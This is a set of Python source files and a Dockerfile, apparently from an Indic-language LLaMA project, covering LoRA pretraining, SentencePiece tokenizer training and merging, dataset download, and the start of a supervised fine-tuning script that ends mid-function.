kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
model_vocab_size = model.get_output_embeddings().weight.size(0)
if not (
(model_vocab_size==32000 and len(tokenizer)==49953) or \
(model_vocab_size==32000 and len(tokenizer)==32000) or \
(model_vocab_size==49953 and len(tokenizer)==49953) or \
(model_vocab_size==49954 and len(tokenizer)==49954)
):
raise ValueError(
f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
"Valid configurations (base model / tokenizer):\n"
"- Continue pre-training original LLaMA: 32000 / 32000 \n"
"- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
"- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
"- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,312 | Python | .py | 574 | 40.409408 | 198 | 0.647754 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,520 | jupyter.dockerfile | adithya-s-k_Indic-llm/docker_environment/jupyter.dockerfile | ARG CUDA_VERSION="11.8.0"
ARG CUDNN_VERSION="8"
ARG UBUNTU_VERSION="22.04"
ARG MAX_JOBS=4
FROM nvidia/cuda:$CUDA_VERSION-cudnn$CUDNN_VERSION-devel-ubuntu$UBUNTU_VERSION as base-builder
ENV PATH="/root/miniconda3/bin:${PATH}"
ARG PYTHON_VERSION="3.9"
ARG PYTORCH_VERSION="2.0.1"
ARG CUDA="118"
ARG TORCH_CUDA_ARCH_LIST="7.0 7.5 8.0 8.6 9.0+PTX"
ENV PYTHON_VERSION=$PYTHON_VERSION
ENV TORCH_CUDA_ARCH_LIST=$TORCH_CUDA_ARCH_LIST
RUN apt-get update \
&& apt-get install -y wget git build-essential ninja-build git-lfs libaio-dev && rm -rf /var/lib/apt/lists/* \
&& wget \
https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh \
&& mkdir /root/.conda \
&& bash Miniconda3-latest-Linux-x86_64.sh -b \
&& rm -f Miniconda3-latest-Linux-x86_64.sh \
&& conda create -n "py${PYTHON_VERSION}" python="${PYTHON_VERSION}"
ENV PATH="/root/miniconda3/envs/py${PYTHON_VERSION}/bin:${PATH}"
WORKDIR /workspace
RUN python3 -m pip install --upgrade pip && pip3 install packaging && \
python3 -m pip install --no-cache-dir -U torch==${PYTORCH_VERSION}+cu${CUDA} deepspeed-kernels --extra-index-url https://download.pytorch.org/whl/cu$CUDA
RUN git lfs install --skip-repo && \
pip3 install awscli && \
# The base image ships with `pydantic==1.8.2` which is not working
pip3 install -U --no-cache-dir pydantic==1.10.10
RUN pip install \
numpy \
torch \
jupyterlab
# start jupyter lab
CMD ["jupyter", "lab", "--ip=0.0.0.0", "--port=8888", "--allow-root", "--no-browser"]
EXPOSE 8888 | 1,541 | Python | .py | 35 | 41.142857 | 157 | 0.704545 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,521 | utils.py | adithya-s-k_Indic-llm/indic_llm/utils.py | from art import text2art
def push_model_to_hub() -> None:
pass
def print_indic_llm_text_art(suffix=None):
font = "nancyj"
ascii_text = " indic-llm"
if suffix:
ascii_text += f" x {suffix}"
ascii_art = text2art(ascii_text, font=font)
print("\n\n")
print(ascii_art) | 303 | Python | .py | 11 | 23.181818 | 47 | 0.632302 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,522 | __init__.py | adithya-s-k_Indic-llm/indic_llm/__init__.py | import re
import logging
# from indic_llm.dataset import *
# from indic_llm.tokenisation import *
from indic_llm.utils import * | 128 | Python | .py | 5 | 24.6 | 38 | 0.804878 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,523 | tokenization.py | adithya-s-k_Indic-llm/indic_llm/tokenization.py | import argparse
import os
import time
import sentencepiece as spm
from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model
from transformers import AutoTokenizer
class SentencePieceTrainer:
def __init__(self):
self.vocab_size = 20000
self.character_coverage = 1.0
self.model_type = "unigram"
# This is NOT perfect but gives high level idea about the composition of the tokenizer
self.language_unicode_ranges = {
'European': ('\u0000', '\u007F'),
'Chinese (Basic)': ('\u4E00', '\u9FFF'),
'Tamil': ('\u0B80', '\u0BFF'),
'Hindi': ('\u0900', '\u097F'),
'Telugu': ('\u0C00', '\u0C7F'),
'Malayalam': ('\u0D00', '\u0D7F'),
'Kannada': ('\u0C80', '\u0CFF'),
'Marathi': ('\u0900', '\u097F'), # Marathi shares the range with Hindi
'Bengali': ('\u0980', '\u09FF'),
}
self.indic_language_unicode_ranges = {
'Devanagari': ('\u0900', '\u097F'),
'Bengali': ('\u0980', '\u09FF'),
'Gurmukhi': ('\u0A00', '\u0A7F'),
'Gujarati': ('\u0A80', '\u0AFF'),
'Oriya': ('\u0B00', '\u0B7F'),
'Tamil': ('\u0B80', '\u0BFF'),
'Telugu': ('\u0C00', '\u0C7F'),
'Kannada': ('\u0C80', '\u0CFF'),
'Malayalam': ('\u0D00', '\u0D7F'),
'Marathi': ('\u0900', '\u097F'),
}
def train_tokenizer(self, input_file, model_prefix , output_dir):
start_time = time.time()
output_model_path = os.path.join(output_dir, f"{self.model_prefix}.model")
spm.SentencePieceTrainer.train(
input=input_file,
model_prefix=model_prefix,
vocab_size=self.vocab_size,
character_coverage=self.character_coverage,
model_type=self.model_type,
train_extremely_large_corpus=True
)
os.rename(
f"{model_prefix}.vocab",
os.path.join(output_dir, f"{model_prefix}.vocab"),
)
os.rename(
f"{model_prefix}.model",
os.path.join(output_dir, f"{model_prefix}.model"),
)
end_time = time.time()
total_time_seconds = end_time - start_time
total_time_minutes = total_time_seconds / 60.0
print(f"Total time taken to train the model: {total_time_minutes:.2f} minutes")
return output_model_path
def merge_tokenizer(self, base_tokenizer_dir, extended_tokenizer_dir):
# load
# logger.
base_tokenizer = AutoTokenizer.from_pretrained(base_tokenizer_dir)
extended_tokenizer = spm.SentencePieceProcessor()
extended_tokenizer.Load(extended_tokenizer_dir)
base_spm = sp_pb2_model.ModelProto()
base_spm.ParseFromString(base_tokenizer.sp_model.serialized_model_proto())
extended_spm = sp_pb2_model.ModelProto()
extended_spm.ParseFromString(extended_tokenizer.serialized_model_proto())
# print number of tokens
print(len(base_tokenizer), len(extended_tokenizer))
print(base_tokenizer.all_special_tokens)
print(base_tokenizer.all_special_ids)
print(base_tokenizer.special_tokens_map)
## Add kannada tokens to LLaMA tokenizer
llama_spm_tokens_set = set(p.piece for p in base_spm.pieces)
print(len(llama_spm_tokens_set))
print(f"Before:{len(llama_spm_tokens_set)}")
for p in extended_spm.pieces:
piece = p.piece
if piece not in llama_spm_tokens_set:
new_p = sp_pb2_model.ModelProto().SentencePiece()
new_p.piece = piece
new_p.score = 0
base_spm.pieces.append(new_p)
print(f"New model pieces: {len(base_spm.pieces)}")
## Save
output_sp_dir = "merged_tokenizer_sp"
output_hf_dir = "merged_tokenizer_hf" # the path to save kannada-LLaMA tokenizer
os.makedirs(output_sp_dir, exist_ok=True)
with open(output_sp_dir + f"/merged_tokenizer.model", "wb") as f:
f.write(base_spm.SerializeToString())
tokenizer = AutoTokenizer(vocab_file=output_sp_dir + "/merged_tokenizer.model")
tokenizer.save_pretrained(output_hf_dir)
print(f"Extended tokenizer has been saved to {output_hf_dir}")
# source code for "count language tokens" taken from https://github.com/abhinand5/tamil-llama/blob/main/scripts/utils/count_indic_tokens.py
def count_language_tokens(self, tokenizer_model):
def is_language(token, ranges):
return any(ranges[0] <= char <= ranges[1] for char in token)
def count_language_tokens(tokenizer, ranges):
return sum(is_language(token, ranges) for token in tokenizer.get_vocab().keys())
tokenizer = AutoTokenizer.from_pretrained(tokenizer_model)
total_vocab_size = len(tokenizer.get_vocab())
print("\n---Note: These calculations are approximate!---\n")
print(f"Total vocabulary size of '{tokenizer_model}': {total_vocab_size}\n")
print(f"{'Language':<20} | {'Tokens':>10} | {'Percentage':>10}")
print("-" * 50)
for language, ranges in self.indic_language_unicode_ranges.items():
count = count_language_tokens(tokenizer, ranges)
percentage = (count / total_vocab_size) * 100
print(f"{language:<20} | {count:>10} | {percentage:>9.2f}%")
def test_tokenizer(self, tokenizer_model, text):
sp = spm.SentencePieceProcessor(model_file=tokenizer_model)
encoded_text = sp.encode(text, out_type=str)
print(encoded_text)
| 5,811 | Python | .py | 115 | 39.095652 | 143 | 0.608152 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,524 | dataset.py | adithya-s-k_Indic-llm/indic_llm/dataset.py | import logging
import os
import json
import pandas as pd
from datasets import Dataset, load_dataset
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def download_dataset(
dataset_name,
dataset_subset,
dataset_split="train",
) -> None:
logger.info("Starting to download/load dataset")
try:
load_dataset(
dataset_name,
dataset_subset,
split=dataset_split,
keep_in_memory=True
)
logger.info("Downloading dataset completed successfully")
except Exception as e:
logger.error("An error occurred while downloading dataset")
logger.error(f"Exception: {e}")
def download_multiple() -> None:
pass
def download_convert_to_txt(
dataset_name,
dataset_subset,
dataset_split,
text_col,
output_file_name,
output_dir = "./corpus"
) -> None:
try:
logger.info("Starting to download/load dataset")
dataset = load_dataset(dataset_name,dataset_subset,split=dataset_split)
logger.info("Dataset loaded/downloaded successfully")
logger.info("Converting to pandas dataframe")
train_df = pd.DataFrame(dataset)
logger.info("Conversion complete")
if not os.path.exists(output_dir):
os.makedirs(output_dir)
corpus_path = os.path.join(output_dir, output_file_name)
logger.info(f"Created output directory: {output_dir}")
else:
logger.info(f"Output directory already exists: {output_dir}")
logger.info("Creating Text corpus")
with open(corpus_path, "w") as file:
for index, value in tqdm(
train_df[text_col].items(), total=len(train_df)
):
file.write(str(value) + "\n")
logger.info("CText corpus Created Successfully")
except Exception as e:
logger.error(f"Error creating the text corpus -> {e}")
return corpus_path
def truncate_text_corpus() -> None:
pass
| 2,149 | Python | .py | 63 | 26.619048 | 79 | 0.643729 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,525 | sft.py | adithya-s-k_Indic-llm/indic_llm/instruct_finetune/llama/sft.py | # Fine-Tune Llama2-7b on SE paired dataset
import os
from dataclasses import dataclass, field
from typing import Optional
import torch
from accelerate import Accelerator
from datasets import load_dataset
from peft import AutoPeftModelForCausalLM, LoraConfig
from tqdm import tqdm
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig, HfArgumentParser, TrainingArguments
from trl import SFTTrainer
from trl.import_utils import is_npu_available, is_xpu_available
from trl.trainer import ConstantLengthDataset
@dataclass
class ScriptArguments:
model_name: Optional[str] = field(default="meta-llama/Llama-2-7b-hf", metadata={"help": "the model name"})
dataset_name: Optional[str] = field(default="lvwerra/stack-exchange-paired", metadata={"help": "the dataset name"})
subset: Optional[str] = field(default="data/finetune", metadata={"help": "the subset to use"})
split: Optional[str] = field(default="train", metadata={"help": "the split to use"})
size_valid_set: Optional[int] = field(default=4000, metadata={"help": "the size of the validation set"})
streaming: Optional[bool] = field(default=True, metadata={"help": "whether to stream the dataset"})
shuffle_buffer: Optional[int] = field(default=5000, metadata={"help": "the shuffle buffer size"})
seq_length: Optional[int] = field(default=1024, metadata={"help": "the sequence length"})
num_workers: Optional[int] = field(default=4, metadata={"help": "the number of workers"})
packing: Optional[bool] = field(default=True, metadata={"help": "whether to use packing for SFTTrainer"})
# LoraConfig
lora_alpha: Optional[float] = field(default=16, metadata={"help": "the lora alpha parameter"})
lora_dropout: Optional[float] = field(default=0.05, metadata={"help": "the lora dropout parameter"})
lora_r: Optional[int] = field(default=8, metadata={"help": "the lora r parameter"})
parser = HfArgumentParser((ScriptArguments, TrainingArguments))
script_args, training_args = parser.parse_args_into_dataclasses()
peft_config = LoraConfig(
r=script_args.lora_r,
lora_alpha=script_args.lora_alpha,
lora_dropout=script_args.lora_dropout,
target_modules=["q_proj", "v_proj"],
bias="none",
task_type="CAUSAL_LM",
)
if training_args.group_by_length and script_args.packing:
raise ValueError("Cannot use both packing and group by length")
# `gradient_checkpointing` was True by default until `1f3314`, but it's actually not used.
# `gradient_checkpointing=True` will cause `Variable._execution_engine.run_backward`.
if training_args.gradient_checkpointing:
raise ValueError("gradient_checkpointing not supported")
def chars_token_ratio(dataset, tokenizer, nb_examples=400):
"""
Estimate the average number of characters per token in the dataset.
"""
total_characters, total_tokens = 0, 0
for _, example in tqdm(zip(range(nb_examples), iter(dataset)), total=nb_examples):
text = prepare_sample_text(example)
total_characters += len(text)
if tokenizer.is_fast:
total_tokens += len(tokenizer(text).tokens())
else:
total_tokens += len(tokenizer.tokenize(text))
return total_characters / total_tokens
def print_trainable_parameters(model):
"""
Prints the number of trainable parameters in the model.
"""
trainable_params = 0
all_param = 0
for _, param in model.named_parameters():
all_param += param.numel()
if param.requires_grad:
trainable_params += param.numel()
print(
f"trainable params: {trainable_params} || all params: {all_param} || trainable%: {100 * trainable_params / all_param}"
)
def prepare_sample_text(example):
"""Prepare the text from a sample of the dataset."""
